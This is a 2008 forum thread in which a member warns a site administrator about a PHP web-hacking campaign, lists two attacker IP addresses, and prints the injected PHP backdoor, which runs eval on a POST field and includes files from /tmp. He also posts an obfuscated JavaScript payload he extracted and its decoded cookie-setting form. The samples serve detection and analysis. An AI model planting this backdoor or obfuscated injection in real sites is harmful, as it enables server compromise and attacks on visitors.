Author Topic: Dear Chocadmin & all  (Read 2686 times)

Offline netbuddy

  • Full Member
  • ***
  • Posts: 786
  • Karma: -1
  • Death by Chocolate Survivor.
    • View Profile
    • Net Buddy
Dear Chocadmin & all
« on: December 09, 2008, 01:07:41 am »
You may want consider blocking 2 IP addresses in your firewall settings.

A Chinese guy -> http://samspade.org/whois/218.93.202.61
A Russian guy -> http://samspade.org/whois/78.110.175.21

Theirs a web site hacking script that people are being hit with. It is particularly nasty in as far as the PHP script takes ownership of the files on the server and inserts in to each file if finds a shore javascript that gets executed on the recipients PC when that page is called.

This is some sort of dropper that will download malware to your PC.

As this is an attack launched through PHP and web forms, a web forum is a likely target, so you may want to be ware and take any precautions that you can.

If any of your PHP site scripts gets compromised and lines like this appears in your PHP scripts, then you have been hit.
Code: [Select]
if(!function_exists('tmp_lkojfghx')){
for($i=1;$i<100;$i++)
if(is_file($f='/tmp/m'.$i))
{
include_once($f);
break;
}

if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
if(!defined('TMP_XHGFJOKL')) 

Keep 'em peeled folks.

Offline chocadmin

  • Administrator
  • Full Member
  • *****
  • Posts: 880
  • Karma: 66
    • View Profile
    • Chocolate Review
Re: Dear Chocadmin & all
« Reply #1 on: December 09, 2008, 10:26:11 pm »
Many thanks, will look at blocking those ranges.
I have my fingers crossed that SMF (the forum software), will keep updating to stop any security issues. It's the only bit of php on the site (apart from the stuff I'm toying with for Facebook).

Offline netbuddy

  • Full Member
  • ***
  • Posts: 786
  • Karma: -1
  • Death by Chocolate Survivor.
    • View Profile
    • Net Buddy
Re: Dear Chocadmin & all
« Reply #2 on: December 13, 2008, 10:21:53 pm »
Well I managed to extract the payload from one server, the other one seems to be unresponsive.

Code: [Select]
_=0;for(i=0;i<9;i++){var d=document.getElementById("_"+i+"_");if(d)d.src=""}eval(unescape('`/!%2F~Ju|%73t`%20f`%75ck `of@f.%2E%2E!�%3C@%64#%69#%76` @s!%74#%79l~e$%3D|%64!i!s@%70@%6C~ay!:no$%6E@%65%3E\nv%61@r $%74%3D%6E$ew%20%44%61te$%28@%31`2|2%39%33035!9%320`0$0|)$%3B%64~%6F%63u#%6D|%65#%6E%74%2E#c!%6F`o`%6B%69%65="!%68|gft`%3D!1|;%20~%65x@p@i$r%65!%73#%3D`"+%74%2Et~oG#%4D%54`%53@t#r%69`n$g#%28$)!%2B%22#%3B# p|%61%74h=/%22;#\n%2F/#%3C$/d~%69%76%3E').replace(/@|\!|~|\?|#|\$|`|\|/g,""));[code]
then is run and turns in to [code]//Just *uck off...<div style=display:none>
var t=new Date(1229301882000);document.cookie="hgft=1; expires="+t.toGMTString()+"; path=/";
//</div>
which IMHO is very childish and says to me that this is very likely a dry run to something else, lets look at this from a logistics point of view, you do not break a server to then poison peoples machines with an empty cookie!?! So this has to be a test run as it only involves 2 servers and in the script I can see that the script is designed to handle 10 servers.
[/code][/code]